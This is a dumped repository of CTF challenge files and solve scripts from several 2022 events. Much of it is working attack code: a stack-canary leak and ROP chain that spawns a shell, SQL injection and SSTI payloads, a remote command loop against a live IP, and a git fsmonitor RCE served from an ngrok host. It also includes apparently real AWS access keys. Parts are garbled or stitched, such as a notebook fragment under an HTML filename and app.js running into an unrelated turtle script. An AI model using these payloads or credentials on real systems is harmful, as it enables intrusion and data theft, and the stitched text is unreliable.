/2022/Cyberwariors-Hackathon-Quals/CyberHackathon_Proof_of_Concept_Babak_Penyisihan_Santri_Anime (1).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/Cyberwariors-Hackathon-Quals/CyberHackathon_Proof_of_Concept_Babak_Penyisihan_Santri_Anime (1).pdf
--------------------------------------------------------------------------------
/2022/Cyberwariors-Hackathon-Quals/READMME.md:
--------------------------------------------------------------------------------
.pdf)
--------------------------------------------------------------------------------
/2022/DiceCTF/crypto/kfb/flag.txt:
--------------------------------------------------------------------------------
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890{}_
--------------------------------------------------------------------------------
/2022/DiceCTF/crypto/kfb/server.py:
--------------------------------------------------------------------------------
#!/usr/local/bin/python -u

from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import pad
from Crypto.Util.strxor import strxor
from more_itertools import ichunked

BLOCK = AES.block_size
FLAG = open('flag.txt', 'rb').read().strip()

def encrypt_block(k, pt):
    cipher = AES.new(k, AES.MODE_ECB)
    return cipher.encrypt(pt)

def encrypt(k, pt):
    assert len(k) == BLOCK
    pt = pad(pt, BLOCK)
    ct = b''
    for bk in ichunked(pt, BLOCK):
        # every block is XORed with the same pad E_k(k), independent of the block index
        ct += strxor(encrypt_block(k, k), bytes(bk))
    return ct

def main():
    k = get_random_bytes(BLOCK)
    enc = encrypt(k, FLAG)
    print(f'> {enc.hex()}')

    pt = bytes.fromhex(input('< '))[:BLOCK]
    enc = encrypt(k, pt)
    print(f'> {enc.hex()}')

if __name__ == '__main__':
    main()
--------------------------------------------------------------------------------
/2022/DiceCTF/crypto/kfb/solve.py:
--------------------------------------------------------------------------------

input_plain = 'A' * 16
input_enc = "76bc16a9f5b95995e83aa5d4472d4e41"

flag_enc = "0ec376dc9ec22fe7a759ddab22513a0e15d86fda8ef63deaa759c1b1315b013903f36dd78ade3ada9a1986f16f593c6603943e8a80cd7cb1852db2c3503a5956"

def brute_key(plain, enc):
    '''brute force the key. enc is hex, plain is ascii'''
    enc = bytes.fromhex(enc)
    key = ""
    for i, v in enumerate(enc):
        for j in range(256):
            if chr(v ^ j) == plain[i]:
                key += j.to_bytes(1, "big").hex()
                break
    return key

def xor_enc(enc, key):
    '''xor the enc with the key. enc is hex, key is hex'''
    key = bytes.fromhex(key)
    enc = bytes.fromhex(enc)
    flag = ""
    for i, v in enumerate(enc):
        s = v ^ key[i % len(key)]
        flag += chr(s)
    return flag.encode("ascii").hex()

def get_patern():
    '''build the pattern dictionary and return it,
    where the key is the hex pattern and the value is the ascii character'''
    patern_hex = "3033323534373639383b3a3d3c3f3e212023222524272629282b1013121514171619181b1a1d1c1f1e010003020504070609080b606362656467666968612a2c0e"
    patern_hex = [patern_hex[i:i+2] for i in range(0, len(patern_hex), 2)]
    alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890{}_"
    lst = dict()
    for i, v in enumerate(alphabet):
        lst[patern_hex[i]] = v
    return lst

def translate_patern(enc):
    '''translate the hex pattern to ascii, where enc is hex'''
    enc = [enc[i:i+2] for i in range(0, len(enc), 2)]
    patern = get_patern()
    text = ""
    try:
        for i in enc:
            text += patern[i]
    except KeyError:
        # stop at the first byte that is not in the pattern table (padding)
        return text
    return text

key = brute_key(input_plain, input_enc)
ugly_flag = xor_enc(flag_enc, key)

flag = (translate_patern(ugly_flag))

print(flag)
--------------------------------------------------------------------------------
/2022/DiceCTF/crypto/obp/obp.output.txt:
--------------------------------------------------------------------------------
babda2b7a9bcbda68db38dbebda68dbdb48db9b7aba18dbfb6a2aaa7a3beb1a2bfb7b5a3a7afd8

--------------------------------------------------------------------------------
/2022/DiceCTF/crypto/obp/solve.py:
--------------------------------------------------------------------------------
import random

with open('obp.output.txt', 'r') as f:
    plaintext = bytearray.fromhex(f.read())

# print(plaintext)

for i in range(256):
    random.seed(i)
    key = random.randrange(256)
    ciphertext = [key ^ byte for byte in plaintext]

    print(bytes(ciphertext))

# hope{not_a_lot_of_keys_mdpxuqlcpmegqu}
--------------------------------------------------------------------------------
/2022/DiceCTF/crypto/pem/encrypted.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/DiceCTF/crypto/pem/encrypted.bin
--------------------------------------------------------------------------------
/2022/DiceCTF/crypto/pem/flag.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/DiceCTF/crypto/pem/flag.txt
--------------------------------------------------------------------------------
/2022/DiceCTF/crypto/pem/generate.py:
--------------------------------------------------------------------------------
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP

with open('flag.txt','rb') as f:
    flag = f.read()

key = RSA.generate(2048)
cipher_rsa = PKCS1_OAEP.new(key)
enc = cipher_rsa.encrypt(flag)

with open('privatekey.pem','wb') as f:
    f.write(key.export_key('PEM'))

with open("encrypted.bin", "wb") as f:
    f.write(enc)

--------------------------------------------------------------------------------
/2022/DiceCTF/crypto/pem/privatekey.pem:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/2022/DiceCTF/crypto/pem/solve.py:
--------------------------------------------------------------------------------
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP

private_key = RSA.import_key(open('privatekey.pem').read())
cipher_rsa = PKCS1_OAEP.new(private_key)
with open('encrypted.bin', 'rb') as f:
    enc = f.read()
flag = cipher_rsa.decrypt(enc)
print(flag)
--------------------------------------------------------------------------------
/2022/DiceCTF/rev/check/.gdb_history:
--------------------------------------------------------------------------------
disass main
exit
disass main
disass -function
disass *-fflush
disass *strcmp
disass 0x1886
disass *0x1886
exit
b *0x192d
run
n
n
run
clear
clear *0x192d
b *0x192a
run
n
run
c *0x192a
clear *0x192a
run
disass strcpm
disass *strcmp
b *strcmp
run
n
exit
python
import gdb

gdb.execute("b *strcmp")
for i in range(10):
    gdb.execute("n")
end
python
import gdb

gdb.execute("b *strcmp")
gdb.execute("run")
for i in range(10):
    gdb.execute("n")
end
n
c
python
import gdb

gdb.execute("b *strcmp")
gdb.execute("run")
for i in range(40):
    gdb.execute("n")
end
exit

--------------------------------------------------------------------------------
/2022/DiceCTF/rev/check/challenge:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/DiceCTF/rev/check/challenge
--------------------------------------------------------------------------------
/2022/DiceCTF/rev/check/solve.py:
--------------------------------------------------------------------------------
import gdb

gdb.execute("b *strcmp")
gdb.execute("run")
for i in range(40):
    gdb.execute("n")
--------------------------------------------------------------------------------
/2022/DiceCTF/rev/slices/solve.py:
--------------------------------------------------------------------------------

flag = ["a" for i in range(32)]

flag[:5] = 'hope{'
flag[-1] = '}'
flag[5::3] = 'i0_tnl3a0'
flag[4::4] = '{0p0lsl'
flag[3::5] = 'e0y_3l'
flag[6::3] = '_vph_is_t'
flag[7::3] = 'ley0sc_l}'

print('flag is: ', "".join(flag))

--------------------------------------------------------------------------------
/2022/DiceCTF/web/inspect-me/README.md:
--------------------------------------------------------------------------------
For this challenge, I only needed to download the absolute clicker extension in Chrome, then download the source code of this challenge.
--------------------------------------------------------------------------------
/2022/DiceCTF/web/inspect-me/inspect-me.mc.ax.html:
--------------------------------------------------------------------------------
Output: %s
34 |= QQ[]\n", 57 | "\n", 58 | "pq = ideal([p * q - N, p ^ 4 - q ^ 3 - hint]).variety()\n", 59 | "print(pq)" 60 | ] 61 | }, 62 | { 63 | "cell_type": "markdown", 64 | "metadata": {}, 65 | "source": [ 66 | "Back to Python:" 67 | ] 68 | }, 69 | { 70 | "cell_type": "code", 71 | "execution_count": 1, 72 | "metadata": {}, 73 | "outputs": [ 74 | { 75 | "name": "stdout", 76 | "output_type": "stream", 77 | "text": [ 78 | "b'maple{s0lving_th3m_p3rf3ct_r000ts_1s_fun}'\n" 79 | ] 80 | } 81 | ], 82 | "source": [ 83 | "from Crypto.Util.number import long_to_bytes, inverse\n", 84 | "\n", 85 | "p = 11248052945492193606877386307812298309646455365482356576580845624056836046347518805927852646289457003475918197991787867864250859819603651806169306473552239\n", 86 | "q = 11917573148183173444338385104784582231114229409447057112131253050235068806316496452352116287542988361044359262597423159386263430710183647113674868056755407\n", 87 | "\n", 88 | "phi = (p-1)*(q-1)\n", 89 | "\n", 90 | "n = 134049493752540418773065530143076126635445393203564220282068096099004424462500237164471467694656029850418188898633676218589793310992660499303428013844428562884017060683631593831476483842609871002334562252352992475614866865974358629573630911411844296034168928705543095499675521713617474013653359243644060206273\n", 91 | "e = 65537\n", 92 | "c = 110102068225857249266317472106969433365215711224747391469423595211113736904624336819727052620230568210114877696850912188601083627767033947343144894754967713943008865252845680364312307500261885582194931443807130970738278351511194280306132200450370953028936210150584164591049215506801271155664701637982648648103\n", 93 | "\n", 94 | "# d = pow(e, -1, phi)\n", 95 | "# or\n", 96 | "d = inverse(e, phi)\n", 97 | "pt = pow(c, d, n)\n", 98 | "decrypted = long_to_bytes(pt)\n", 99 | "print(decrypted)" 100 | ] 101 | } 102 | ], 103 | "metadata": { 104 | "kernelspec": { 105 | "display_name": "Python 3.10.5 64-bit", 106 | "language": "python", 107 | "name": "python3" 108 | }, 109 | "language_info": { 110 | "codemirror_mode": { 111 | "name": "ipython", 112 | "version": 3 113 | }, 114 | "file_extension": ".py", 115 | "mimetype": "text/x-python", 116 | "name": "python", 117 | "nbconvert_exporter": "python", 118 | "pygments_lexer": "ipython3", 119 | "version": "3.10.5" 120 | }, 121 | "orig_nbformat": 4, 122 | "vscode": { 123 | "interpreter": { 124 | "hash": "e7370f93d1d0cde622a1f8e1c04877d8463912d04d973331ad4851f04de6915a" 125 | } 126 | } 127 | }, 128 | "nbformat": 4, 129 | "nbformat_minor": 2 130 | } 131 |
--------------------------------------------------------------------------------
/2022/MapleCTF 2022/pwn/README.md:
--------------------------------------------------------------------------------
# warmup1

bof length 24

Because this is a PIE binary and the original return address happens to sit right next to the `win` function, we only need to overwrite the low part of the address.

# warmup2
Flow of the exploit:

```python
from pwn import *  # p8 / p64 are used below
# `p` is the pwntools tube connected to the challenge binary.

# [Phase 1 - First Input] leak canary
p.recvuntil(b'What\'s your name?\n')
p.sendline(b'A' * 264)
print(p.recv(271).decode())

tmp = b'\x00'
tmp += p.recv(7)

canary = int.from_bytes(tmp, byteorder='little')
print('[+] Canary: ' + hex(canary))

# [Phase 1 - Second Input] jump back to `main`, because in the next phase we leak the base address of the binary. And since we already have the canary, stack smashing will not be detected :3
p.recvuntil(b'How old are you?\n')

payload = b'A' * 264
payload += p64(canary)
payload += b'A' * 8
payload += p8(0x9E) # 0x9E is the low byte of the address of `main`, so we recurse here until we have everything we need.
p.send(payload)

# [Phase 2 - First Input] leak bin base addr
p.recvuntil(b'What\'s your name?\n')
p.sendline(b'A' * 248)
print(p.recv(255))

tmp = b'\xf0'
tmp += p.recv(5)

base = int.from_bytes(tmp, byteorder='little') - 0x12F0

print('[+] base: ' + hex(base))

# [Phase 2 - Second Input] jump back to `main` again.
p.recvuntil(b'How old are you?\n')

payload = b'A' * 264
payload += p64(canary)
payload += b'A' * 8
payload += p8(0x9E)
p.send(payload)

# [Phase 3 - First Input] leak libc base addr
p.recvuntil(b'What\'s your name?\n')
p.sendline(b'A' * 184)
print(p.recv(191))

tmp = b'\x80'
tmp += p.recv(5)

libc = int.from_bytes(tmp, byteorder='little') - 0x1ce980
print('[+] libc: ' + hex(libc))

# [Phase 3 - Second Input] jump to system("/bin/sh") using a pop rdi gadget
pop_rdi = 0x1353 # bin
system = 0x45880 # libc
binsh = 0x194882 # libc

payload = b'A' * 264
payload += p64(canary)
payload += b'A' * 8
payload += p64(base + pop_rdi)
payload += p64(libc + binsh)
payload += p64(libc + system)
p.send(payload)

p.interactive()

# and we got shell :3
```

--------------------------------------------------------------------------------
/2022/MapleCTF 2022/pwn/terminal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/MapleCTF 2022/pwn/terminal.png
--------------------------------------------------------------------------------
/2022/MapleCTF 2022/pwn/warmup1/chal:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/MapleCTF 2022/pwn/warmup1/chal
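The canary leak in Phase 1 of the warmup2 flow in pwn/README.md works only when the name buffer is echoed as a C string after a read that neither bounds the input nor NUL-terminates it. The C model below is an added example, not the challenge's source or the write-up author's code: the 264-byte distance to the canary is taken from the write-up, while the frame layout, the sample canary and tail bytes, and all function names are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed frame layout: 264 bytes of name buffer (offset from the write-up),
 * then the canary, then saved rbp and return address (illustrative). */
#define NAME_LEN   264
#define CANARY_LEN 8
#define TAIL_LEN   16
#define FRAME_LEN  (NAME_LEN + CANARY_LEN + TAIL_LEN)

/* Constructed sample values. glibc keeps the canary's lowest byte at 0x00 so
 * that string functions normally stop before reaching the secret bytes. */
static const unsigned char SAMPLE_CANARY[CANARY_LEN] =
    {0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77};
static const unsigned char SAMPLE_TAIL[TAIL_LEN] =
    {0x10, 0xe0, 0xff, 0xff, 0xff, 0x7f, 0x00, 0x00,
     0x42, 0x13, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00};

static void frame_init(unsigned char *frame) {
    memset(frame, 0, NAME_LEN);
    memcpy(frame + NAME_LEN, SAMPLE_CANARY, CANARY_LEN);
    memcpy(frame + NAME_LEN + CANARY_LEN, SAMPLE_TAIL, TAIL_LEN);
}

/* Weak form: models a read() whose length exceeds the buffer and which adds
 * no terminator. The copy is clamped to the modelled frame so the demo itself
 * never leaves its array. */
static void store_unbounded(unsigned char *frame, const unsigned char *in, size_t n) {
    if (n > FRAME_LEN) n = FRAME_LEN;
    memcpy(frame, in, n);
}

/* Hardened form: never writes past the name buffer and always terminates it. */
static void store_bounded(unsigned char *frame, const unsigned char *in, size_t n) {
    if (n > NAME_LEN - 1) n = NAME_LEN - 1;
    memcpy(frame, in, n);
    frame[n] = '\0';
}

/* Bytes a printf("%s", buf) would emit: it stops at the first NUL it finds,
 * not at the end of the buffer. */
static size_t echoed_len(const unsigned char *frame) {
    const unsigned char *nul = memchr(frame, 0, FRAME_LEN);
    return nul ? (size_t)(nul - frame) : FRAME_LEN;
}

/* Original canary bytes that fall inside the echoed range. */
static size_t leaked_canary_bytes(const unsigned char *frame) {
    size_t n = echoed_len(frame), leaked = 0;
    for (size_t i = 0; i < CANARY_LEN; i++)
        if (NAME_LEN + i < n && frame[NAME_LEN + i] == SAMPLE_CANARY[i])
            leaked++;
    return leaked;
}

/* Feeds 264 'A' bytes plus a newline (the shape of the first input in the
 * write-up) through the chosen store routine. */
static size_t run_case(int hardened, int *intact) {
    unsigned char frame[FRAME_LEN];
    unsigned char input[NAME_LEN + 1];
    frame_init(frame);
    memset(input, 'A', NAME_LEN);
    input[NAME_LEN] = '\n';
    if (hardened)
        store_bounded(frame, input, sizeof input);
    else
        store_unbounded(frame, input, sizeof input);
    if (intact)
        *intact = memcmp(frame + NAME_LEN, SAMPLE_CANARY, CANARY_LEN) == 0;
    return leaked_canary_bytes(frame);
}

size_t leak_unbounded(void) { return run_case(0, NULL); }
size_t leak_bounded(void)   { return run_case(1, NULL); }
int canary_intact_after(int hardened) {
    int ok = 0;
    run_case(hardened, &ok);
    return ok;
}

int main(void) {
    printf("unbounded read: %zu canary bytes echoed, canary intact=%d\n",
           leak_unbounded(), canary_intact_after(0));
    printf("bounded read:   %zu canary bytes echoed, canary intact=%d\n",
           leak_bounded(), canary_intact_after(1));
    return 0;
}
```

The stack protector only helps while the canary stays secret, so the fix belongs at the read: bound it to the buffer size and terminate the string before it is printed.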
--------------------------------------------------------------------------------
/2022/MapleCTF 2022/pwn/warmup1/flag.txt:
--------------------------------------------------------------------------------
test{flag}
--------------------------------------------------------------------------------
/2022/MapleCTF 2022/pwn/warmup1/solve.py:
--------------------------------------------------------------------------------
from pwn import *

exe = ELF("./chal", checksec=False)
context.log_level = "WARNING"
context.binary = exe
context.terminal = "konsole -e".split()

def gdbdebug(exe: process):
    script = """
    break *win
    finish
    """
    gdb.attach(exe, gdbscript=script)

p = process()
gdbdebug(p)
payload = b""
payload += b"aaaabaaacaaadaaaeaaafaaa"
payload += b"\x19"
p.send(payload)
p.interactive()
--------------------------------------------------------------------------------
/2022/MapleCTF 2022/web/Bookstore/Solve.py:
--------------------------------------------------------------------------------
import requests

URL = "http://localhost:3000"

def send(payload):
    print(payload)
    r = requests.post(URL+"/download-ebook", data={
        "option": "kindle",
        "email": payload,
        "bookID": 1
    }, proxies={
        # "http":"http://localhost:8080"
    })
    print(r.text)

payload = "\"',(SELECT texts FROM books WHERE id = 1)); -- --@lol.com"
send(payload)

--------------------------------------------------------------------------------
/2022/MapleCTF 2022/web/Bookstore/bookstore.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/MapleCTF 2022/web/Bookstore/bookstore.zip
--------------------------------------------------------------------------------
/2022/MapleCTF 2022/web/Pickle Factory/pickle-factory.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/MapleCTF 2022/web/Pickle Factory/pickle-factory.zip
--------------------------------------------------------------------------------
/2022/MapleCTF 2022/web/Pickle Factory/solve.py:
--------------------------------------------------------------------------------
import requests


URL = "http://pickle-factory.ctf.maplebacon.org"


def create_pickle(payload):
    r = requests.post(URL+"/create-pickle", data={
        "foo": payload
    })
    return r.text


def view_pickle(uid):
    r = requests.get(URL+"/view-pickle", params={
        "filler": "",
        "space": "",
        "uid": uid
    })
    return r.text


cmd = "cat flag.log"
# vulnerability SSTI
payload = '{"asd":"||{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen(\'' + cmd + '\').read()}}||"}'
n = view_pickle(create_pickle(payload))
print(n)

--------------------------------------------------------------------------------
/2022/MapleCTF 2022/web/honksay/a.out:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/MapleCTF 2022/web/honksay/a.out
--------------------------------------------------------------------------------
/2022/MapleCTF 2022/web/honksay/honksay.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/MapleCTF 2022/web/honksay/honksay.tar.gz
--------------------------------------------------------------------------------
/2022/MapleCTF 2022/web/honksay/hosted/._Dockerfile:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/MapleCTF 2022/web/honksay/hosted/._Dockerfile
--------------------------------------------------------------------------------
/2022/MapleCTF 2022/web/honksay/hosted/._public:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/MapleCTF 2022/web/honksay/hosted/._public -------------------------------------------------------------------------------- /2022/MapleCTF 2022/web/honksay/hosted/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:alpine 2 | 3 | # Create app directory 4 | WORKDIR /usr/src/honksay 5 | 6 | # env values 7 | ENV PORT=9988 8 | ENV FLAG="maple{fakefleg}" 9 | 10 | RUN apk add --no-cache \ 11 | chromium \ 12 | nss \ 13 | freetype \ 14 | harfbuzz \ 15 | ca-certificates \ 16 | ttf-freefont \ 17 | nodejs 18 | 19 | ENV PUPPETEER_SKIP_CHROMIUM_DOWNLOAD=true \ 20 | PUPPETEER_EXECUTABLE_PATH=/usr/bin/chromium-browser 21 | 22 | # Install rest of the packages 23 | COPY package*.json ./ 24 | RUN npm install 25 | 26 | # App src 27 | COPY . . 28 | 29 | # Expose port 30 | EXPOSE 9988 31 | 32 | # User 33 | RUN addgroup -S ctf && adduser -S ctf -G ctf 34 | USER ctf:ctf 35 | 36 | # Start 37 | CMD [ "node", "app.js"] 38 | -------------------------------------------------------------------------------- /2022/MapleCTF 2022/web/honksay/hosted/app.js: -------------------------------------------------------------------------------- 1 | const express = require("express"); 2 | const cookieParser = require('cookie-parser'); 3 | const goose = require("./goose"); 4 | const clean = require('xss'); 5 | 6 | const app = express(); 7 | app.use(cookieParser()); 8 | app.use(express.urlencoded({extended:false})); 9 | 10 | const PORT = process.env.PORT || 9988; 11 | 12 | const headers = (req, res, next) => { 13 | res.setHeader('X-Frame-Options', 'DENY'); 14 | res.setHeader('X-Content-Type-Options', 'nosniff'); 15 | return next(); 16 | } 17 | app.use(headers); 18 | app.use(express.static('public')) 19 | 20 | const template = (goosemsg, goosecount) => ` 21 | 22 |
23 | 42 | 43 | ${goosemsg === '' ? '': `list: 11 | '''find all x and y coordinates in the data''' 12 | x = re.findall(r'x=(\d+)', dat) 13 | y = re.findall(r'y=(\d+)', dat) 14 | return x, y 15 | 16 | def get_comands(dat) -> list: 17 | '''find all command in the data''' 18 | com = re.findall(r'(?<=event=).*(?= HT)', dat) 19 | return com 20 | 21 | x, y = getxy(data) 22 | comand = get_comands(data) 23 | turtle.setup(WIDTH*100, HEIGHT*100) 24 | turtle.goto(0, 0) 25 | 26 | turtle.speed(10) 27 | 28 | def pixel_method(pix, size): 29 | turtle.shape('circle') 30 | turtle.shapesize(size, size) 31 | mouse = "mouseup" 32 | for i in range(len(x)): 33 | if mouse == "mouseup": 34 | turtle.penup() 35 | elif mouse == "mousedown": 36 | x_pix = (int(x[i])//pix) 37 | y_pix = (int(y[i])//pix) 38 | turtle.goto((x_pix*pix)-300, (y_pix*pix)) 39 | turtle.stamp() 40 | if comand[i] == 'mousedown': 41 | mouse = "mousedown" 42 | elif comand[i] == 'mouseup': 43 | mouse = "mouseup" 44 | while True: 45 | pass 46 | 47 | def pen_method(): 48 | mouse = "mouseup" 49 | for i in range(len(x)): 50 | if mouse == "mouseup": 51 | turtle.penup() 52 | elif mouse == "mousedown": 53 | turtle.pendown() 54 | if comand[i] == 'mousedown': 55 | mouse = "mousedown" 56 | elif comand[i] == 'mouseup': 57 | mouse = "mouseup" 58 | turtle.goto(int(x[i])-300, int(y[i])) 59 | while True: 60 | pass 61 | 62 | pixel_method(7, size=0.1) 63 | # pen_method() -------------------------------------------------------------------------------- /2022/corCTF 2022/whack-a-frog/whacking-the-froggers.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/corCTF 2022/whack-a-frog/whacking-the-froggers.pcap -------------------------------------------------------------------------------- /2022/csawctf-qual-2022/Pasted image 20220912170611.png: 
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/csawctf-qual-2022/Pasted image 20220912170611.png
--------------------------------------------------------------------------------
/2022/csawctf-qual-2022/Pasted image 20220912171239.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/csawctf-qual-2022/Pasted image 20220912171239.png
--------------------------------------------------------------------------------
/2022/csawctf-qual-2022/Pasted image 20220912171311.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/csawctf-qual-2022/Pasted image 20220912171311.png
--------------------------------------------------------------------------------
/2022/ctf.nullcon.net/Cloud 9*9/README.md:
--------------------------------------------------------------------------------
Bypass Python jail: [rce.py](rce.py)
Use aws credentials: [access.py](access.py)
--------------------------------------------------------------------------------
/2022/ctf.nullcon.net/Cloud 9*9/access.py:
--------------------------------------------------------------------------------
import os
aws_creds = """
[default]
AWS_DEFAULT_REGION=eu-central-1
AWS_SECRET_ACCESS_KEY=Kr/VrI3xYyFJV0hHdCqvvL8XS/0+10eyiihLVmHc
AWS_REGION=eu-central-1
AWS_ACCESS_KEY_ID=ASIA22D7J5LEAJ27IDGC
"""
with open('/home/wowon/.aws/credentials', 'w') as f:
    f.write(aws_creds)
os.system('aws s3 cp s3://nullcon-s3bucket-flag4/flag4.txt .')

--------------------------------------------------------------------------------
/2022/ctf.nullcon.net/Cloud 9*9/flag4.txt:
--------------------------------------------------------------------------------
ENO{L4mbda_make5_yu0_THINK_OF_ENVeryone}
--------------------------------------------------------------------------------
/2022/ctf.nullcon.net/Cloud 9*9/rce.py:
--------------------------------------------------------------------------------
import requests
import readline
from base64 import b64encode
import json

url = "http://3.64.214.139"


def comand(cmd):
    cmd = b64encode(cmd.encode()).decode()
    payload = "__import__('os').popen('echo {} | base64 -d | bash').read()".format(cmd)
    r = requests.post(url+"/calc",
        json={"input": payload,},
        # proxies={'http': 'http://localhost:8080',}
    )
    js = r.text
    js = json.loads(js)
    return js["result"]


while True:
    cmd = input("rce> ")
    print(comand(cmd))
--------------------------------------------------------------------------------
/2022/ctf.nullcon.net/Cloud 9*9/set.env.sh:
--------------------------------------------------------------------------------
export AWS_ACCESS_KEY_ID="ASIA22D7J5LEAJ27IDGC"
export AWS_SECRET_ACCESS_KEY="Kr/VrI3xYyFJV0hHdCqvvL8XS/0+10eyiihLVmHc"
export AWS_SESSION_TOKEN=""
export AWS_DEFAULT_REGION="eu-central-1"
--------------------------------------------------------------------------------
/2022/ctf.nullcon.net/Git To the Core/README.md:
--------------------------------------------------------------------------------
RCE: [connect.py](connect.py)
--------------------------------------------------------------------------------
/2022/ctf.nullcon.net/Git To the Core/connect.py:
--------------------------------------------------------------------------------
from pwn import *
import os
import re

# reference: https://lwn.net/Articles/892755/

RMT = "52.59.124.14", 10001
MYGIT = "http://0.tcp.ap.ngrok.io:17745/.git/"

CONFIG = """
[core]
    repositoryformatversion = 0
    filemode = true
    bare = false
    logallrefupdates = true
    fsmonitor = "echo \\"Pwned as $(%s)\\">&2; false"
"""

context.log_level = "WARNING"

class Exploit:
    def __init__(self, cmd, rmt=RMT, git=MYGIT, configTemplate=CONFIG):
        self.rmt = rmt
        self.git = git
        self.cmd = cmd
        self.configTemplate = configTemplate
        if not os.path.exists(".git/"):
            os.system("git init")

    def conn(self, cmd):
        r = remote(*RMT)
        r.sendlineafter(b"Please provide an URL: ", bytes(cmd, "utf-8"))
        return r

    def rceConfig(self, cmd):
        with open(".git/config", "w") as f:
            f.write(self.configTemplate % cmd)
        return None

    def start(self):
        self.rceConfig(self.cmd)
        self.conn(self.git).interactive()

Exploit("cat /FLAG").start()
--------------------------------------------------------------------------------
/2022/ctf.nullcon.net/Git To the Core/task.py:
--------------------------------------------------------------------------------
import os
import tempfile
import subprocess
import shutil

print("Challenge was created with <3 by @gehaxelt.")
git_url = input("Let's dump a .git/ repository from a web server of your choice. Please provide an URL: ")

uid = 1500 #cloner
gid = 65534 #nobody

temp_dir = tempfile.mkdtemp()
os.chown(temp_dir, uid, -1)

# https://stackoverflow.com/questions/2699907/dropping-root-permissions-in-python/2699996#2699996
os.setgroups([])
os.setgid(gid) #nobody
os.setuid(uid) #cloner

os.chdir(temp_dir)
print("Running command: ", ' '.join(["/opt/GitTools/Dumper/gitdumper.sh", git_url, "./repo"]))
clone_output = subprocess.run(["/opt/GitTools/Dumper/gitdumper.sh", git_url, "./repo"], capture_output=True, timeout=10, text=True)

print(clone_output.stdout)
print(clone_output.stderr)

if os.path.exists("./repo") and os.path.isdir("./repo"):
    os.chdir("./repo")
    print("Running git checkout: ", ' '.join(["git", "checkout", "."]))
    checkout_output = subprocess.run(["git", "checkout", "."], capture_output=True, timeout=10, text=True)
    print(checkout_output.stdout)
    print(checkout_output.stderr)
else:
    print("Failed to clone the repository!")

os.chdir(temp_dir)
shutil.rmtree(temp_dir)

--------------------------------------------------------------------------------
/2022/ctf.nullcon.net/Unis Love Code/chall.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
import urllib.parse
import http.server
import socketserver
import re
import os
import cgi
import string
from io import StringIO
# from flag import FLAG
FLAG = "test{flag}"


class UnisLoveCode(http.server.SimpleHTTPRequestHandler):
    server_version = "UnisLoveCode"
    username = 'ADMIN'
    check_funcs = ["strip", "lower"]

    def do_GET(self):
        self.send_response(-1337)
        self.send_header('Content-Length', -1337)
        self.send_header('Content-Type', 'text/plain')
        s = StringIO()
        s.write("""Wait,whatisHTML?!Ishouldhavelistenedmorecarefullytotheprofessor...\nAnyhow,passwordlessisthenewhottopic,sojustprovidemethecorrectusername=viaPOSTandImightshowyoumyhomework.\nOh,incaseyouneedthesource,hereyougo:\n""")
        s.write("---------------------------------\n")
        s.write(re.sub(r"\s+", '', open(os.path.realpath(__file__), "r").read()))
        s.write("\n")
        s.write("---------------------------------\n")
        s.write("\nChallengecreatedwith<3by@gehaxelt\n")
        self.end_headers()
        self.wfile.write(s.getvalue().encode())

    def _check_access(self, u):
        for cf in UnisLoveCode.check_funcs:
            print("getattr:"+getattr(str, cf)(UnisLoveCode.username))
            print("u:"+u)
